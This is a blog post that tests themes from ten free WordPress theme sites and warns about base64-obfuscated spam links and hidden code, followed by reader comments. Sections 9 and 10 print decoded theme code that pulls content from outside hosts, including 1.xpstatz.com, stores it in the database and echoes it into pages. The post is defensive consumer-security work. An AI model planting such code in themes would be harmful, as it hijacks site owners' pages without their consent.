Themes

Why You Should Never Search For Free WordPress Themes

by 559 Responses

Update: I have written a post about where you can find free WordPress themes. So once you get to the end of this and are suitably concerned you can check it out for some great places to find your themes.

A few months ago I wrote about WordPress Security. Now, armed only with the words “free WordPress themes,” builtBackwardsTheme Authenticity Checker Plugin and Donncha O Caoimh’s Exploit Scanner, I’m going to take a look through the first page of Google to see just how safe pages ranking for “Free WordPress Themes” are.

Note: I am not uploading any of these themes onto my server. Instead I have installed xampp and am running WordPress locally on my computer. I don’t advise uploading themes from random websites directly onto your server – you never know what you could catch! There are some nasty diseases out there…..

1. WordPressThemesBase

WordPress Themes Base is in the lucky position of being the top ranking site for “Free WordPress Themes.” Someone’s been working hard on their SEO! The blurb at the bottom tells the visitor that unlike other sites offering free WordPress themes, the themes at WordPress Themes Base are fresh. Great, there’s nothing better than a fresh theme.

I downloaded Prinz Branford Magazine. Already things are looking problematic. Branford Magazine is a theme released by der Prinz. There is a very old version of the theme which (as far as I can tell) isn’t up-to-date with WordPress 3.0 and a Pro was released earlier this year. That means we’re looking at either a theme that doesn’t work properly with WP 3.0 or a theme that is a knock-off of a pro.

First thing’s first – install the theme and run it through TAC.

Encrypted code found! First site on Google and we’ve already come across Base64 :( Poor me….. Base64 is often used to hide malicious code. I can see that the code is in the footer. Let’s take a look at that:

Yeah, copyright me, damned right! But what is that Base64 hiding. Here it is in the footer code:

Lots of blah.

You can decode this base64 code in two ways :

  1. You can try Otto’s decoder – handy!
  2. You can also do it manually – this involves changing the eval() to an echo() to force whatever’s been hidden out of hiding. This post will walk you through the process.

I’ve gone for option 2. Turning my eval() into an echo() produced this result in my footer:

Eh? A minute ago it said copyright me!!! Bah! Now there’s something about Free Anti-Virus Downloads. Where did that come from? Hidden by the base64 methinks.

The Verdict:

I downloaded another 2 themes from this site and they all contained base64 code. Base 64 does not necessarily just hide links. It can also hide malicious code which can run amok on your site. Not only that but the site, while maintaining that its themes are fresh, is pushing themes built by other designers that the site owner has put base64 code into. I contacted Michael Oeser at der Prinz, who told me that he’s been trying to get in touch with the site about removing the theme but is having no luck. He’s posted a warning on his own blog about the dangers of downloading pirate themes. He’s the designer of Branford Magazine and his advice is to stay well away from sites like this – good advice!

My suggestion:

Avoid!

2. Free WordPress Themes

Another site with free WordPress themes. Great! Just what I need. I’m always after a good freebie. The first theme on the site is called BeautyStore. I like beauty stores so I’ll download that. Get it installed and run it through TAC.

More encrypted code!!!

Here it is in the footer:

For a beauty store it’s not all that beautiful. There are all sorts of encoded functions right in the footer. This time when I turned my eval()s into echo()s I couldn’t get anything to appear. I ran it through a few decoders and it’s far too jumbled up for me :(

Exploit scanner dislikes it as much as I do:

All of these came up as severe warnings.

The Verdict

2nd site on Google and we’re getting more base64. I downloaded a few other themes which contained static links and no base64. I guess that this site is a bit hit and miss. However, with the previous site I could get it decoded and this, no go. A search on some forums for the pieces of code in the footer indicate that it may be encrypted code used for hacking :( I ain’t techie enough to know and I suspect that most WordPress users aren’t either. In that case….

My Suggestion

Avoid!

3. Themes2WP

Scanning through the themes on Themes2WP they’ve certainly got some tempting ones on there. Let’s take a look at Gameliso which looks like a nicely designed magazine theme.

Theme Authenticity Checker says that it has found 5 static links. Static links are okay, right? A developer’s got to link back to their site. Here are the links:

Hmmmmm… I don’t know about you, but I don’t know if singles sites and animal care sites have much to do with theme development. Let’s take a closer look at the code in footer.php:

There are the links, with the helpful message: “Please do not edit following code, it may cause your site to stop working.” What useful information!!!! I would’ve gone and removed the links and broken the whole thing. Phew.

Oh wait… I did remove them and the site still seems to be working.

There’s another link in sidebar.php. Here it is:

Now to check out the styles for ad_lnk:


Wow! That’s a link that’s way out in the middle of nowhere. Can’t be for much except back-linking programmes.

So we’ve checked out the links – let’s run exploit scanner.

Gameliso is picked up as containing an eval () which could be used to execute malicious code. It’s not the type of thing that you want to have showing up in your theme.

The Verdict

Nice themes but contain 5 backlinks to random people who you probably aren’t interested in linking to. It goes so far as to tell you that if you remove the links your theme won’t work. Of course, we know that this isn’t true – but a beginner WordPress user might think twice about removing them. As for the eval function, well it could be harmless but I don’t know enough about javascript (probably like many average WordPress users) to tell you if in this case it is or it isn’t.

My suggestion

Avoid!

4. FreeWPThemes

After assuming that all sites that aren’t WordPress.org are bad, I was surprised to find no odd embedded links in any of the themes that I downloaded from FreeWPThemes. I downloaded 5 themes, from across the site. And they all had the same links:

None of these appear at all out of place. So, I felt a bit bad about my assumptions.

However, I did run the themes against the Theme Check Plugin. The plugin tests your theme to make sure it’s up to the latest theme review standards. Here’s how the Programme theme did:

Lots of errors! There’s even more than that but I couldn’t fit them all into the screenshot.

The Verdict

While the themes from FreeWPThemes might not live up to the exacting standards of the WordPress theme directory, there is nothing malicious about them, nor is there any backlinks. It may be that you come across things that aren’t working in quite the way that you want them to but there’s nothing hidden or evil about them!

My suggestion

Okay to use but check to make sure all of the functionality that you need is working.

5. WordPress.org

Finally! WordPress.org! We all know and love WordPress.org. It is the safest place to go to get your themes. I guess the problem that we all have with the theme repository is that many of the themes look like they were made back in the 1600s (or near enough). This can be frustrating, especially when many of them don’t work too well with WordPress 3.0. At the bottom of this post I’ll list some other safe places that are great for themes.

The Verdict

A totally trusted and safe place to get your free WordPress themes from.

My suggestion

<3

6. Themes.Rock Kitty

This site has a picture of a cat playing a guitar. I am easily pleased by things with cats on them. The first theme that I downloaded had no advertising links or hidden code in it, nor did the second. But the third came up with this:

More Base64!

This time changing my eval()s to echo()s produced this message:

The links at the bottom of the theme appear like this:

Exploit scanner came up with 17 severe warnings for this theme. Since there are only 4 links showing at the bottom I think we can assume that this theme is either packed full of hidden backlinks or there is something else going on.

The Verdict

Use this site very carefully. If you are going to download themes from them install the themes on your local machine and check them out first. This is another site where you could end up downloading a theme that hijacks your site. Be careful!

My suggestion

Avoid!

7. WP Themes Depot

Another website offering the most up-to-date, fresh, beautiful, free WordPress themes. This time I downloaded the most popular theme on the site, Niferiti, downloaded 980 times. Once again I ran it through TAC and came up with encrypted code:

After changing the eval() to an echo() I got this message (again):

Someone obviously doesn’t want me to get rid of the code. The links appear in the footer like so:

It feels a bit disingenuous to me to say that these are links from family and friends. Especially since we’ve seen that message before with different links. But I guess it’s possible that all spammy links come from the same family…… just maybe….. right?

Update: Okay, so I mustn’t have been paying attention to that message. I = doofus! Once again a lesson in reading things properly. In any case, links, whether family friendly or not, should not be hidden using encrypted code that is often used to mask other activity.

The Verdict

Another site with Base64 in the code. I guess I don’t have to repeat how untrustworthy code like this is. While it’s one thing for a developer to include banklinks it’s another when they use base64 to encode the links. Especially when it’s well known that the code is used to hide malware.

My suggestion

Avoid!

8. WPRex

I downloaded 5 themes from WPRex, the first two contained static spammy links and three others contained (surprise surprise) base64.

That’s Pink Desire. This time to decode it I used this decoder.

Here’s what it spat out:

More encrypted links. People do go to quite some lengths to hide their links!

The Verdict

Another site that is a bit hit and miss. If you must download themes from a place like this make sure you check out what it is you have by using something like TAC. You can also use some of the decoder tools I’ll list at the bottom to check out what any base64 is hiding.

My suggestion

Avoid!

9. No Limits Web Design

While this website has a slightly different name to all of the rest making me hope for something different, upon landing it has the similar announcement about all its great free WordPress themes. I downloaded one of the featured themes – Dark Night – and yet again found more base64 in the theme.

As well as the base64 I found a piece of code starting eval(str_rot13(. You can decode that here.

I got these results:

That’s basically the license. However, when I turned the eval to an echo this code appeared at the top of the page:

function wp_code() { $default_link_text = "Default"; $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php"; $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php"; $l = ""; foreach($link_host as $value) { if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) { while (!feof ($file)) { $line = fgets ($file); $l .= $line; } fclose($file); break; } else { if ($value == end($link_host)) { $l=$default_link_text; } } } return $l; } function check_wp_code_sidebar() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) { } else { $l=""; $f = dirname(__file__) . "/sidebar.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); fclose($fd); if (strpos($c, $l) == 0) { die; } } } check_wp_code_sidebar();

I got one of our lovely Incsubbers to take a look at it and he translated it as:

function wp_code() {
		$default_link_text = "Default";
		$link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
		$link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
		$l = "";
		foreach($link_host as $value) {
			if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) {
				while (!feof ($file)) {
					$line = fgets ($file);
					$l .= $line;
				}
				fclose($file);
				break;
			} else {
				if ($value == end($link_host)) {
					$l=$default_link_text;
				}
			}
		}
		return $l;
	} 

	function check_wp_code_sidebar() {
		$uri = strtolower($_SERVER["REQUEST_URI"]);
		if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) {
		} else {
			$l="";
			$f = dirname(__file__) . "/sidebar.php";
			$fd = fopen($f, "r");
			$c = fread($fd, filesize($f));
			fclose($fd);
			if (strpos($c, $l) == 0) { die; }
		}
	} 

	check_wp_code_sidebar();

The theme is pulling urls into the sidebar, if they don’t appear then die. Poor site :(

Here’s what exploit scanner has to say:

The Verdict

Another site using base64, another one to stay out of the way of. This one is even more encrypted than the others, which ended up showing much more quickly what they are up to.

My suggestion

Avoid!

Phew… getting to the end now… this is exhausting!

10. Templates Browser

Nearly at the end! Actually I did a little search about Templates Browser and found this post. So we can already guess what’s going to happen here. I downloaded the Dropshadow theme, which is actually by Brian Gardner but which you can no longer get from his site (probably because it’s pretty old and not WP 3.0 compatible). Although the TAC only found static links like so:

The static link in the footer is a huge piece of PHP. The source code of the site reveals that it is calling a link to a casino site. However, it has some write elements which make me more suspicious. I got my friendly Incsubber to partially decode it:

1.	get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
3.	$l_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");
4.
5.	if (empty($l_time_code)) {
6.	        $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
7.	        $new_time_code = 0;
8.	} else
9.	        $new_time_code = intval($l_time_code[0]);
10.
11.	if (empty($l_code)) {
12.	        $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '
', 'no')");
13.	        $new_l_code = '
';
14.	} else $new_l_code = $l_code[0];
15.
16.	if ( ( time() - $new_time_code ) >= 60 ) {
17.	        $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
18.	        $R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
19.	        $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
20.	        $xps = "xps.";
21.	        $url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
22.	        $page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);
23.
24.	        //1.xpstatz.com/xps.php?h=host&u=uri
25.
26.	        if (ini_get('allow_url_fopen')) {
27.	                $new_l_code = @file_get_contents("http://" . $url . $page);
28.	        }
29.	        else {
30.	                $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
31.
32.	                if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
33.	                        @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
34.	                        @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1rn");
35.	                        @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $urlrn");
36.	                        @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Closernrn");
37.	                        $new_l_code = "";
38.	                        while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
39.	                                $new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
40.	                        }
41.	                        $new_l_code = trim(strstr($new_l_code, "rnrn"));
42.	                }
43.	                @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
44.	        }
45.	        if ( strpos($new_l_code, '[/]') ) {
46.	                $new_time_code = time();
47.	                $R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
48.	                $wpdb->query("UPDATE $wpdb->options SET option_value=$new_time_code WHERE option_name='l_time_code'");     $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
49.	}
50.
51.	}
52.	if ( strpos($new_l_code, '[/]') ) {
53.	        $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
54.	        $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
55.	        echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
56.	        $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
57.	}
58.	?>

Doesn’t mean a whole lot to me either….

But it stores the links in wp_options and checks every 60 seconds to grab the code from an external site. Then it updates the timecodes and links in the options table before outputting them in the footer.

Basically a much more complex method of doing everything that we’ve seen already.

The Verdict

Things are already looking suspicious when another site is claiming that Templates Browser contains malware. And even more suspicious when they’re hawking an old theme which has been designed by an established WordPress designer. All of that code in the footer is not good, and is another way of taking control of your site.

My suggestion

Avoid!

Here’s a video from ThemeLab which does what I did, but quicker!

Conclusion

Out of the ten sites on the first page of Google, here are the stats:

  • Safe: 1
  • Iffy: 1
  • Avoid: 8

8 out of 10 sites included base64 encoding in their themes. The average WordPress user no doubt knows that Google isn’t the best place to find themes but the stats on these sites show that there are thousands of people downloading them and using them on their websites. Someone who has come to WordPress on the first time is more than likely to type “free WordPress themes” into Google to find a site that gives them what they want. Unfortunately they’re more than likely to end up with spammy links, at best, on their site.

Of course, the WordPress Theme Directory can be frustrating in its lack of themes that work with WordPress 3.0. Many of the themes look a little out of date and lots look very bloggy. Here are some trusted sites where you can find WordPress themes, free and otherwise.

Free Themes

Premium Sites

There are plenty more so look around! Don’t type free WordPress themes into Google though!

Tip: A legitimate site offering free WordPress themes will not have the word “WordPress” in its url. WordPress is trademarked and if a site is going to violate trademarks it’s likely to be unscrupulous about inserting spam and other code into themes. Here’s what WordPress have to say about it. (thanks to Jim - see comments below – for correcting me on that!!!!)

Decoders

If you are investigating a theme that you think is suspicious you might find the following decoding tools helpful (source):

Useful Plugins

Further Reading

Featured Plugin - WordPress Ecommerce Shopping Cart Plugin

Out of all the WordPress ecommerce plugins available, MarketPress has got to be the winner - easy to configure, powerful functionality, multiple gateways and more. A simply brilliant plugin!
Find out more

Featured Plugin - WordPress Google Maps Plugin

Simply insert google maps into posts, sidebars and pages - show directions, streetview, provide image overlays and do it all from a simple button and comprehensive widget.
Find out more

Featured Plugin - WordPress Facebook Plugin

Would you like to add Facebook comments, registration, 'Like' buttons and autoposting to your WP site? Well, The Ultimate Facebook plugin has got that all covered!
Find out more

Featured Plugin - WordPress Infinite SEO Plugin

Fully integrated with the SEOMoz API, complete with automatic links, sitemaps and SEO optimization of your WordPress setup - this is the only plugin you need to help you rank your site number 1 on Google - nothing else compares.
Find out more

Featured Plugin - WordPress Appointments Plugin

Take, set and manage appointments and client bookings without having to leave WordPress. Appointments+ makes it easy.
Find out more

Featured Plugin - WordPress Membership Site Plugin

If you're thinking about starting a paid, or just private, membership site then this is truly the plugin you've been looking for. Easy to use, massively configurable and ready to go out of the box!
Find out more

Featured Plugin - WordPress Wiki Plugin

To get a wiki up and running you used to need to install Mediawiki and toil away for days configuring it... not any more! This plugin gives you *all* the functionality you want from a wiki, in WordPress!!!
Find out more

Featured Plugin - WordPress Pop-Up Chat Plugin

No javascript required, no third part chat engine, just fully featured chat right in your own database on your own WP sites - couldn't be easier.
Find out more

Featured Plugin - WordPress Q&A Site Plugin

It's now incredibly easy to start your own Q&A site using nothing more than WordPress - The Q&A plugin simply and brilliantly transforms any site, or page, into a perfect support or Q&A environment.
Find out more
Tags , , ,

Comments (559)

  6. I am a newbie at wordpress, setting up wp websites for friends and family. Inasmuch as most of the sites I set up are on a budget, we use free wp themes on all of them. I was utterly aghast at your findings, and to think that I just click on those top serp sites and download the free themes assuming that their makers are cool honest guys.

    Now, I have some tools to use to check these themes. The TAC tool however seems to have been un-updated since 2009.

    • Hi james you are right Theme Authenticity Checker is not updated but it still works with the latest WordPress version and help many WordPress users from malicious themes.

  7. I have already came across several sites which does the same. In most of the cases, I avoid using those themes. Merely glancing at the footer.php gives you an idea how bad this themes could be. Avoid Avoid Avoid

  8. Wow, this is a scary article, but essential reading. I didn’t realise so many free theme sites were adding rogue code to their themes. I’ve just downloaded the Arras theme (minus Tim Thumb to avoid the vulnerability issue) and will give it a test run to see if it can replace some of the themes we’re using. Thanks for all the excellent information.

  10. Another theme that has malware on it is Groove Bordeaux. I downloaded it because I liked the look but when I did I ended up with my sites being hacked. I was able to go through the code and clean it up.. but definitely one to stay away from too.
    Cheers
    John

  11. Great work Siobhan. I don’t know if this was pointed out by your other commenters, but the globalEval code caught by Exploit Scanner is likely just a bit of harmless jquery. Not sure why Exploit Scanner is chucking a wobbly over that, it’s found in every installation of wordpress that uses jquery. You can see the exact same verbiage yourself by doing a test search of any local or server copy of jquery.js

    Thanks for turning us on to some great tools, too!

  16. Great work Siobhan, i am happy i found this post. i tweeted and i follow u. i am a newbie,just a month old. the other day,when i analysed my site with a tool i found some links, with which i was not familiar. i was suspecting some thing, but i could not find where from they were coming.now i know.thanks,great info.

  19. Thanks , I’ve just been searching for information about this subject for a while and yours is the greatest I have discovered so far. However, what concerning the conclusion? Are you positive concerning the supply?|What i do not realize is in fact how you are not actually a lot more neatly-appreciated than you might be right now. You are very intelligent.

  20. Great post, very informative. I ponder why the opposite specialists of this sector don’t realize this. You should continue your writing. I am confident, you’ve a great readers’ base already!|What’s Taking place i’m new to this, I stumbled upon this I have discovered It positively helpful and it has helped me out loads. I hope to contribute & help other customers like its helped me. Great job.

  22. I’d like to point out that generally I would agree with the sentiment of your article in regards to free WP Themes (I hate encrypted ones). That is why we devoted our site to the best in free wp themes (non-encrypted). Check it out if you have the time. It will be worth it!!

  23. Themes with encrypted code usually have all kind of fancy features, slider, outstanding design etc. This code simply is meant to have those commercial links not removed. Agreed, themes have to be thoroughly checked before going to your server.
    On the other side if you buy a premium theme, things are also complex. Many premium themes load awfully slow. Constant wordpress updates require to also have your theme upgraded, but who guarantees? Premium themes are rarely tested on all different types of servers, surelly a risk factor. Many wordpress users meanwhile have thousands of articles/comments. To buy a premium theme and then to find out that your pics of all your 5000 posts are not activated as featured image with proper size and therefore dont show up in the newly bought premium theme is another obstacle. So yes, agreed, temptation to carelessly try out “free themes” is there.

  24. Very informative blog. I haven’t used WordPress yet but I was very keen on learning about it. I always search on Google and it scared me upon learning that these top search engines might contain malware. Thank you for sharing, most specially guiding us where to find free WordPress themes which is safe. Brilliant post!

  25. Excellent items from you, man. I’ve remember your stuff previous to and you are simply extremely great. I really like what you have bought right here, certainly like what you are saying and the way through which you are saying it. You are making it entertaining and you continue to take care of to stay it smart. I can’t wait to read much more from you. That is actually a tremendous website.

  26. Thank you for giving me information where to find WordPress without being scared I might stumble on malware. I’m just so glad I came across this blog, very helpful really. I always depend on google for years, so surprised of these top search engines containing malware. Tnaks again!

  27. Thank you for giving me information where to find WordPress without being scared I might stumble on malware. I’m just so glad I came across this blog, very helpful really. I always depend on google for years, so surprised of these top search engines containing malware. Thanks again!

    • Obviously over 22% (and growing daily) of all of the website owners and corporations in the world including (just to name a few) CNN, Yahoo, Harvard, NASA, FOX, The New York Times, Flickr, Rolling Stone, Meebo, C|net, Le Monde, Nancy Pelosi, Rosie O’Donnell, Stephen Colbert, Anousheh Ansari, Stanford, MIT, Second Life, Xerox, The US Post Office, Ford Motors….disagree with you.

      They aren’t using “programmers” they are using WordPress Developers. You need to add some skills to your resume my friend. The web is passing you by.

  35. Thank you for all the effort you’ve put into the investigation and the article, even though I just found it now. I was aware of all those things prior to reading your article, but I was doing all the checking for base64 and unwanted links by hand. Thanks to you, I found about TAC and I just ran all the free themes I’m using for the sites I run or manage through it. It saves a lot of time and effort! Thankfully, I have developed my own theme for my personal website, so no need to worry about it :) I would recommend that to everybody who has the knowledge and skill, and of course – the time!
    Thank you again for pointing that great plugin put for me :)

  37. hallo:)
    I have just started up my own website, and until now, I have only installed plugins (Antivirus,BPS,Exploit scanner,secure wordpress, TAC and WP-malwatch) to secure my site.when I scan with exploit scanner it shows me 16 level severes? ex. located from plugin: antivirus and wp-malwatch an secure wordpress. in this it shows base64 and eval.. how can that be possible? Are these plugins not secure to use?
    Hope someone can help me:)

  39. This valuable information came at just the right time! I have 2 questions….first, I tried to duplicate what you did and I was never able to get the encrypted code I found using TAC and Otto’s decocer to decode into anything intelligible. I can’t figure out how to select out the proper snippit I think.
    Second and most important…I have a site with a free theme and I found a lot of embedded base64 code. If I install a clean theme, will my site then go on to recover from the SEO damage done?

  41. I just found your site with this page. Absotely loved it. Bookmarking it right away.

    Great insights into the search term. I’ll be sure to watch out for these now. Thanks a lot

  42. Nice work with all the detail.

    But who doesn’t already know this information.

    None of this is malicious nor harmful, you just hated on some websites because its trendy to diss free WP themes.

    • Sean – in reality, this could be both malicious and harmful. If your site links out to bad neighbourhoods (and chances are that base64 hidden links are likely to point to spammy sites) it can easily end in a Google penalty, particularly if it’s a new / untrusted site…

      Matt

  45. Great Post. A few times I’ve had to do this search, mainly due to severe limitations in budget. The code is fairly easy to sniff out, normally in the footer.php file and if you know how you can remove it yourself … you can take that base 64 code and dump it here http://www.opinionatedgeek.com/dotnet/tools/base64decode/ for example. From that you strip out that bit of code and take the rest back replacing the base 64 section… it is that simple.

    So if you must go down this path do so with care.

    Also note most free premium type themes will have say images called with base 64 – these are used as metrics and not links to another site… it means Woo can see who is using that theme for example and how popular a theme is such that it can decide which theme needs updating maybe.

  47. I used to use free WordPress themes until several of my websites became infected with malicious code. It took me forever to clean the code from those websites. I learned my lesson. I deleted all of the bookmarks I had of websites that were offering free WordPress themes, and I bought the StudioPress Pro Package. It cost a lot of money, but it was well worth it. Not only do my websites look better but the perform better to because they are very well coded. If you must use a free WordPress them, try StudioPress, they have a few free ones.

  49. Great post! I never used free themes so far, but only because their restrictive flexibility, I simply preferred to make my own designs in an online theme generator like Lubith and work in the code afterwards (when you do it yourself, it’s easy to figure out when/why/how things go wrong in the code), I never thought of verifying the source of pre-made themes to see what is going on back there.

    Great article, thanks!

  51. An absolutely mindbogglingly informative article and comments. Fortunately, I’m too dumb to look for free themes with a search engine and stick with the ones offered on my WP blog dashboard. I assume they’re all okay. Started looking for a paid theme recently, but was pretty disappointed when one vendor failed to answer the one question I had about it before I was willing to pay for it. That seemed kind of slack. Beautiful theme, though and perfect for my travel blog.

  55. I currently have a wordpress.com blog, and have been wanting to upgrade to a wordpress.org I have been looking into a new theme to go with it. I am careful when I download things, but I would have never seen the things you pointed out. It really makes me rethink how I was theme hunting.

    Thank you for this great public service!

  56. Guess with hundreds of comments, you don’t really need one more, however here is one more. You had me at 1. I’m new to new WordPress being a former 1&1 customer (locked into super old version), but am looking for ways to make my blog visually interesting. I never would have realized the dangers your exposed. Thanks!

    epaulstanley.com

  57. A friend of mine is using Gameliso (referred to in point 3) and asked me to make some cosmetic changes to the site. One of these changes was to remove the footer links. I did this and am now locked out of the site. I can’t access it to change theme. All I get is a message saying ‘This theme is sponsored, all links in the footer should remain intact’.
    Can anyone advise as to what I can do to gain access?

  58. This is a great post with plenty of detail Ismail, thank you.
    Dennis O’Brien just shared it in a WordPress Help and Share group on Facebook I’m pleased I took the time to click through and read it. Years back people – dodgy developers! did things like adding links in white text on a white page. I thought all these kinds of sneaky tricks had stopped long ago! This has been a great lesson for my continued education. :)

  61. Great article, Siobhan. I could tell you have spent a lot of time on this article and your patience in doing so deserves an applause. I just wanted to check with you to see if the base64 encryption can be found out by using an Anti-virus scanner. I have a feeling that the anti-virus software may not be able to detect these encryption & declare it as clean, in an event of which, we will need to manually scan through the entire source code for inspection. So I just want to know how reliable can the anti-virus scanners are in this regard.

    Thanks again!

  62. as a hand coding html5/css designer stepping into the WP waters, I experienced something that really spooked me out. Viewing a SE marketers website, I liked what I saw, did “viewsource” and found where I can download the theme which happened to be free. That theme, and another theme that caught my eye, i uploaded to my bluehost. a week later bluehost sends an email saying they patched a timthumb file that they said was corrupt(?).
    Kudos to Blue Host. Does GoDaddy do the same?
    Lately I’ve been getting requests from prospective web design clients saying their WP was “hacked” and that they need a new website.
    Your research (even tho a year later) has got me on edge with this. do you have an updated article for 4Q2012?

  64. Just a matter of curiosity, if you search again for “free wordpress themes” you’ll get completely different results now, much more relevant (only a few malicious sites that you mentioned are still on the first page). We have to say thanks to the Google team and their recent Panda, Penguin and other updates regarding the quality of websites and search results. Regards!

  65. Great post! I never used free themes so far, but only because their restrictive flexibility, I simply preferred to make my own designs in an online theme generator like Lubith and http://gameschotabheem.com/ work in the code afterwards (when you do it yourself, it’s easy to figure out when/why/how things go wrong in the code), I never thought of verifying the source of pre-made themes to see what is going on back there.

  66. Great post! I never used free themes so far, but only because their restrictive flexibility, I simply preferred to make my own designs in an online theme generator like Lubith and work in the code afterwards http://gameschotabheem.com/ (when you do it yourself, it’s easy to figure out when/why/how things go wrong in the code), I never thought of verifying the source of pre-made themes to see what is going on back there.

  74. It’s like a quandary, you can get a very pretty theme for free but it comes at a costs. I guess it is the Trojan Horse.
    Well I have been warned and will now just buy paid themes and even then I will check the theme.
    Thanks for the post.

  75. Stumbled on to this from the Learn WP in One Week page. Created an account just to say how awesome this is! I have already learned SO much and I’m looking forward to all the helpful info.

    Thanks!

Participate